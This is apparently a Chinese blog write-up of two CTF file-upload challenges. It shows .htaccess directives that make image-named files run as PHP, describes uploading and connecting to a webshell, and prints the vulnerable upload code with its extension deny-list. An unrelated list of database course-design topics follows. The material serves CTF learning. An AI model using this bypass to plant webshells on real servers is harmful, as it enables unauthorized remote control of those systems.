文件上传之图片上传题目

[A]文件上传之图片上传题目


Give me your photo PLZ

提示

我好想看一些好康的图片呜呜

题目

在这里插入图片描述

.htaccessApache的又一特色。一般来说,配置文件的作用范围都是全局的,但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess(分布式配置文件)

<FilesMatch "zx"> #文件中含有zx(包括后缀)
SetHandler application/x-httpd-php #当文件名中有zx则以php执行
</FilesMatch>

或者

AddType application/x-httpd-php .jpg #文件后缀为.jpg为php执行

上传 .hataccess文件

在这里插入图片描述

上传zx🐎。

在这里插入图片描述

执行php命令。

在这里插入图片描述
在这里插入图片描述

成功getshell,结束,谢谢徐师傅。

最后贴上源码:

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>文件上传</title>
</head>
<body>
    <h1 align="center">大家好,这是一个不会写前端的web手做的图片渲染器,上传图片,我会帮你渲染出来的</h1>
    <?php
    if(!empty($_FILES)) {
        if ($_FILES["file"]["error"] > 0) {
            echo "错误:" . $_FILES["file"]["error"] . "<br>";
        } else {
            $extension = explode(".", $_FILES["file"]["name"]);
            $extension = ".".strtolower(end($extension));
            $deny_ext = array(".php", ".php5", ".php4", ".php3", ".php2", ".php1", ".html", ".htm", ".phtml", ".pht", ".pHp", ".pHp5", ".pHp4", ".pHp3", ".pHp2", ".pHp1", ".Html", ".Htm", ".pHtml", ".jsp", ".jspa", ".jspx", ".jsw", ".jsv", ".jspf", ".jtml", ".jSp", ".jSpx", ".jSpa", ".jSw", ".jSv", ".jSpf", ".jHtml", ".asp", ".aspx", ".asa", ".asax", ".ascx", ".ashx", ".asmx", ".cer", ".aSp", ".aSpx", ".aSa", ".aSax", ".aScx", ".aShx", ".aSmx", ".cEr", ".sWf", ".swf", ".ini");
            if (in_array($extension, $deny_ext)) {
                exit("上传木马可不是好习惯~~~");
            } else {
                move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . strtolower($_FILES["file"]["name"]));
                echo "<img src='upload/" . strtolower($_FILES["file"]["name"]) . "'>";
            }
        }
    }
    ?>
    <form align="center" method="post" enctype="multipart/form-data">
        <label for="file">文件名:</label>
        <input type="file" name="file" id="file">
        <input type="submit" name="submit" value="提交">
    </form>
</body>
</html>

参考链接

https://blog.csdn.net/qq_61988806/article/details/123245564


[MRCTF2020]你传你🐎呢

在这里插入图片描述

试了下,.htaccess可以上传。

所以上传

<FilesMatch "zx"> #文件中含有zx(包括后缀)
SetHandler application/x-httpd-php #当文件名中有zx则以php执行
</FilesMatch>

上传之后,再上传zx.php。

蚁剑链接即可。

出问题请看:https://blog.csdn.net/weixin_44632787/article/details/118049911

总结:操作不规范,getshell两行泪。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《数据库原理与管理信息系统实践》选 课程设计的主要目的是巩固应用所学的知识,锻炼和培养动手能力。本着这个思 路,所提供的课程设计选题目要是学生比较熟悉或比较常见的应用,不需要用太 多的精力去学习理解其业务的。(具体要求见第二阶段任务) 注:小组也可以自拟选,需经主讲教师同意 题目1:职工工资管理系统 基本功能要求: 1) 可以按照科室(经理室、财务科、技术科和销售科)增加、修改、删除职工的基本资料 2) 职工信息应包含职称,分为高级、中级、初级,同一职称职工基本工资相同 3) 职工工资由基本工资、奖金、扣除金额组成,其中奖金、扣除金额可每月输入不同数据 4) 可以计算职工每月工资 5) 可以按照科室、职称、月份统计职工工资 6) 可以按照科室、职工号、职工名称查询职工工资 题目2:商场货物管理系统 基本功能要求: 1) 商场货物可存放在多个仓库 2) 可以增加、删除、修改仓库信息 3) 可以对仓库货物信息进行增加、删除、修改 4) 可以按仓库、货物类别列出货物清单 5) 能按照仓库名称、货物类别、货物名称、编码查询货物信息 题目3:宠物商店电子商务网站 客户购物、下订单、订单处理、销售统计等功能于一体的例子。通过浏览器,让客户 可以查询宠物,把货物放入购物车,创建账户/登陆账户,创建订单,通过信用卡支付等 。 基本功能要求: 1)注册/登陆/忘记密码/管理个人信息 2)查询、删除、修改等维护宠物信息 3)接受/处理订单消息,发订单给供应商 4)销售统计 5)维护库存数据库 6)Email发送 题目4:毕业设计指导网站 毕业设计指导网站的目的是使学生和教师能够通过网络进行毕业设计辅导,这样能够 得到最新的毕业设计信息,更好的辅导效果。内容如下: 基本功能要求: 1)用户注册/登陆/忘记密码/管理个人信息 2)上传文件和下载文件 3)学生向指导教师提问、查询问;教师回答问 4)用户上传文件和下载文件 5)管理员管理教师和学生信息 6)查询统计数据(日问量,答疑率) 7)群发消息 题目5:客房信息管理系统 基本功能要求: 1) 可以对客房基本信息进行增加、删除、修改 2) 客房分为三种类型:三人房、双人房、单人房,每种类型房间价位不同 3) 可以实现客户订房、退房、续房功能 4) 可以登记、查询客户基本信息 5) 可以查询房间状态信息 6) 可以实现住宿计费 题目6:汽车租赁管理系统 基本功能要求: 1) 可以对汽车基本信息进行增加、删除、修改 2) 可以对租赁客户信息进行增加、删除、修改 3) 可以实现汽车的租借、归还、续借 4) 可以按重要字段查询汽车、客户等基本信息 5) 可以实现租赁金额的计算 6) 可以查询汽车、客户租赁历史记录 题目7:网上订票系统 (要求采用B/S结构设计) 基本功能要求: 1) 可以实现订票客户网上信息登记以及修改 2) 可以查询可订票情况 3) 可以实现客户网上订票 4) 可以计算订票费用 5) 业务人员可以审核客户网上订票信息 6) 订票客户可以查询当前订票状态 题目8:实验室网上预约管理系统 (要求采用B/S结构设计) 基本功能要求: 1) 可以实现各实验室基本信息的增加、删除、修改 2) 学生可以查询实验基本信息 3) 学生可以登记基本信息 4) 学生可以实现实验室预约 5) 管理员可以审核学生预约申请 6) 学生可以查询实验室预约申请状态 题目9:高校职工通讯录管理系统 (要求采用B/S结构设计) 基本功能要求: 1)可以实现高校各部门、学院基本信息的增加、删除、修改 2)可以实现各部门、学院职工通讯方式的增加、删除、修改 3)可以查询职工通讯信息 4)可以列表输出各部门、学院职工通讯方式清单 题目10:餐厅下单管理系统 基本功能要求: 1) 可以实现菜谱基本的信息增加、删除、修改、查询 2) 可以实现顾客下单信息的增加、删除、修改、查询 3) 可以实现顾客下单金额折扣计算 4) 可以实现顾客下单明细的列表输出 题目11:高校设备管理系统 基本功能要求: 1) 可以实现高校部门、学院基本信息的增加、删除、修改 2) 可以实现设备基本信息的增加、删除、修改 3) 可以查询设备基本信息 4) 可以汇总输出各单位所属设备清单以及总金额 题目12:在线答疑系统 (要求采用B/S结构设计) 基本功能要求: 1) 可以实现学生基本信息的增加、删除、修改 2) 学生可以在线提问、修改提问 3) 教师可以回复、删除学生提问 4) 可以查询学生提问信息 5) 可以列表输出问清单 题目13:在线新闻管理系统 (要求采用B/S结构设计) 基本功能要求: 1) 可以实现新闻类别信息的增加、删除、修改 2) 可以实现新闻基本信息的增加、删除、修改 3) 可以实现新闻列表输出 4) 可以浏览新闻详细信息

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值